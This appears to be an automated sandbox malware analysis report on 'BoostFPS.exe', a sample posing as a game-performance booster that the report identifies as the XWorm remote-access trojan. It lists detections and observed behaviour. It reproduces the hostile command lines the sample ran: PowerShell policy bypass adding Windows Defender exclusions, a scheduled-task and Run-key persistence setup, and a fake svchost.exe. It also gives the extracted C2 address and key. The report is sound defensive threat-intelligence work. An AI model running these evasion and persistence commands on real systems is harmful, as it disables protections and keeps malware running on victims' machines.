Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BoostFPS.exe

Overview

General Information

Sample name:BoostFPS.exe
Analysis ID:1559236
MD5:20f5290def51514fefaed2b744ed961c
SHA1:546f5c611c1d35c5104e2792c76934746f637987
SHA256:3e6f0de70c94df15b3aecb8ce4370e26b62fa38a24bf3710d0d9f0a28b4da656
Tags:exeuser-Slimzick
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files with benign system names
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspect Svchost Activity
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • BoostFPS.exe (PID: 5252 cmdline: "C:\Users\user\Desktop\BoostFPS.exe" MD5: 20F5290DEF51514FEFAED2B744ED961C)
    • cmd.exe (PID: 3176 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\FPS_BY FILMGODX.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • mode.com (PID: 5332 cmdline: Mode 100,25 MD5: BEA7464830980BF7C0490307DB4FC875)
      • chcp.com (PID: 6672 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • cmd.exe (PID: 4308 cmdline: C:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %b in (1) do rem" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • svchost.exe (PID: 7160 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: A50564ADE45C0A409BB38C06673D6AB9)
      • powershell.exe (PID: 4164 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3364 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6208 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3292 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 3116 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 3608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 6968 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: A50564ADE45C0A409BB38C06673D6AB9)
  • svchost.exe (PID: 6292 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: A50564ADE45C0A409BB38C06673D6AB9)
  • svchost.exe (PID: 2704 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: A50564ADE45C0A409BB38C06673D6AB9)
  • svchost.exe (PID: 4748 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: A50564ADE45C0A409BB38C06673D6AB9)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["45.141.27.248"], "Port": 7777, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\svchost.exeJoeSecurity_XWormYara detected XWormJoe Security
    C:\Users\user\AppData\Roaming\svchost.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      C:\Users\user\AppData\Roaming\svchost.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xe785:$s6: VirtualBox
      • 0xe6e3:$s8: Win32_ComputerSystem
      • 0x112a7:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x11344:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x11459:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x10309:$cnc4: POST / HTTP/1.1

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000004.00000002.3313721624.00000000025A1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000004.00000000.2099134483.00000000001A2000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_XWormYara detected XWormJoe Security
          00000004.00000000.2099134483.00000000001A2000.00000002.00000001.01000000.00000006.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0xe585:$s6: VirtualBox
          • 0xe4e3:$s8: Win32_ComputerSystem
          • 0x110a7:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x11144:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x11259:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x10109:$cnc4: POST / HTTP/1.1
          00000000.00000002.2101315629.00000000024E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            00000000.00000002.2101315629.00000000024E1000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x39f85:$s6: VirtualBox
            • 0x4d3c5:$s6: VirtualBox
            • 0x39ee3:$s8: Win32_ComputerSystem
            • 0x4d323:$s8: Win32_ComputerSystem
            • 0x3caa7:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x4fee7:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x3cb44:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x4ff84:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x3cc59:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x50099:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x3bb09:$cnc4: POST / HTTP/1.1
            • 0x4ef49:$cnc4: POST / HTTP/1.1
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.BoostFPS.exe.250c800.2.unpackJoeSecurity_XWormYara detected XWormJoe Security
              4.0.svchost.exe.1a0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                4.0.svchost.exe.1a0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                  0.2.BoostFPS.exe.250c800.2.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                  • 0xc985:$s6: VirtualBox
                  • 0xc8e3:$s8: Win32_ComputerSystem
                  • 0xf4a7:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                  • 0xf544:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                  • 0xf659:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                  • 0xe509:$cnc4: POST / HTTP/1.1
                  4.0.svchost.exe.1a0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                  • 0xe785:$s6: VirtualBox
                  • 0xe6e3:$s8: Win32_ComputerSystem
                  • 0x112a7:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                  • 0x11344:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                  • 0x11459:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                  • 0x10309:$cnc4: POST / HTTP/1.1
                  Click to see the 8 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Files With System Process Name In Unsuspected Locations
                  Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\BoostFPS.exe, ProcessId: 5252, TargetFilename: C:\Users\user\AppData\Roaming\svchost.exe
                  Sigma detected: Potentially Suspicious Malware Callback Communication
                  Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 45.141.27.248, DestinationIsIpv6: false, DestinationPort: 7777, EventID: 3, Image: C:\Users\user\AppData\Roaming\svchost.exe, Initiated: true, ProcessId: 7160, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49979
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 7160, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', ProcessId: 4164, ProcessName: powershell.exe
                  Sigma detected: Suspect Svchost Activity
                  Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 6968, ProcessName: svchost.exe
                  Sigma detected: System File Execution Location Anomaly
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\BoostFPS.exe", ParentImage: C:\Users\user\Desktop\BoostFPS.exe, ParentProcessId: 5252, ParentProcessName: BoostFPS.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 7160, ProcessName: svchost.exe
                  Sigma detected: Change PowerShell Policies to an Insecure Level
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 7160, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', ProcessId: 4164, ProcessName: powershell.exe
                  Sigma detected: CurrentVersion Autorun Keys Modification
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 7160, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 7160, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', ProcessId: 4164, ProcessName: powershell.exe
                  Sigma detected: Startup Folder File Write
                  Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 7160, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
                  Sigma detected: Suspicious Add Scheduled Task Parent
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 7160, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", ProcessId: 3116, ProcessName: schtasks.exe
                  Sigma detected: Suspicious Schtasks From Env Var Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 7160, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", ProcessId: 3116, ProcessName: schtasks.exe
                  Sigma detected: Uncommon Svchost Parent Process
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\BoostFPS.exe", ParentImage: C:\Users\user\Desktop\BoostFPS.exe, ParentProcessId: 5252, ParentProcessName: BoostFPS.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 7160, ProcessName: svchost.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 7160, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', ProcessId: 4164, ProcessName: powershell.exe
                  Sigma detected: Windows Processes Suspicious Parent Directory
                  Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\BoostFPS.exe", ParentImage: C:\Users\user\Desktop\BoostFPS.exe, ParentProcessId: 5252, ParentProcessName: BoostFPS.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 7160, ProcessName: svchost.exe

                  Persistence and Installation Behavior

                  barindex
                  Sigma detected: Schedule system process
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 7160, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", ProcessId: 3116, ProcessName: schtasks.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-20T10:38:23.025464+010028528701Malware Command and Control Activity Detected45.141.27.2487777192.168.2.549979TCP
                  2024-11-20T10:38:30.155148+010028528701Malware Command and Control Activity Detected45.141.27.2487777192.168.2.549979TCP
                  2024-11-20T10:38:37.774760+010028528701Malware Command and Control Activity Detected45.141.27.2487777192.168.2.549979TCP
                  2024-11-20T10:38:52.524533+010028528701Malware Command and Control Activity Detected45.141.27.2487777192.168.2.549979TCP
                  2024-11-20T10:39:00.152420+010028528701Malware Command and Control Activity Detected45.141.27.2487777192.168.2.549979TCP
                  2024-11-20T10:39:07.971525+010028528701Malware Command and Control Activity Detected45.141.27.2487777192.168.2.549979TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-20T10:38:23.234175+010028529231Malware Command and Control Activity Detected192.168.2.54997945.141.27.2487777TCP
                  2024-11-20T10:38:37.779144+010028529231Malware Command and Control Activity Detected192.168.2.54997945.141.27.2487777TCP
                  2024-11-20T10:38:52.684134+010028529231Malware Command and Control Activity Detected192.168.2.54997945.141.27.2487777TCP
                  2024-11-20T10:39:07.972978+010028529231Malware Command and Control Activity Detected192.168.2.54997945.141.27.2487777TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-20T10:38:30.155148+010028528741Malware Command and Control Activity Detected45.141.27.2487777192.168.2.549979TCP
                  2024-11-20T10:39:00.152420+010028528741Malware Command and Control Activity Detected45.141.27.2487777192.168.2.549979TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-20T10:38:22.520365+010028559241Malware Command and Control Activity Detected192.168.2.54997945.141.27.2487777TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: BoostFPS.exeAvira: detected
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeAvira: detection malicious, Label: TR/Spy.Gen
                  Found malware configuration
                  Source: 00000004.00000002.3313721624.00000000025A1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["45.141.27.248"], "Port": 7777, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeReversingLabs: Detection: 84%
                  Multi AV Scanner detection for submitted file
                  Source: BoostFPS.exeReversingLabs: Detection: 65%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: BoostFPS.exeJoe Sandbox ML: detected
                  Sample uses string decryption to hide its real strings
                  Source: 4.0.svchost.exe.1a0000.0.unpackString decryptor: 45.141.27.248
                  Source: 4.0.svchost.exe.1a0000.0.unpackString decryptor: 7777
                  Source: 4.0.svchost.exe.1a0000.0.unpackString decryptor: <123456789>
                  Source: 4.0.svchost.exe.1a0000.0.unpackString decryptor: <Xwormmm>
                  Source: 4.0.svchost.exe.1a0000.0.unpackString decryptor: XWorm V5.6
                  Source: 4.0.svchost.exe.1a0000.0.unpackString decryptor: USB.exe
                  Source: 4.0.svchost.exe.1a0000.0.unpackString decryptor: %AppData%
                  Source: 4.0.svchost.exe.1a0000.0.unpackString decryptor: svchost.exe
                  Source: BoostFPS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: BoostFPS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49979 -> 45.141.27.248:7777
                  Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 45.141.27.248:7777 -> 192.168.2.5:49979
                  Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.5:49979 -> 45.141.27.248:7777
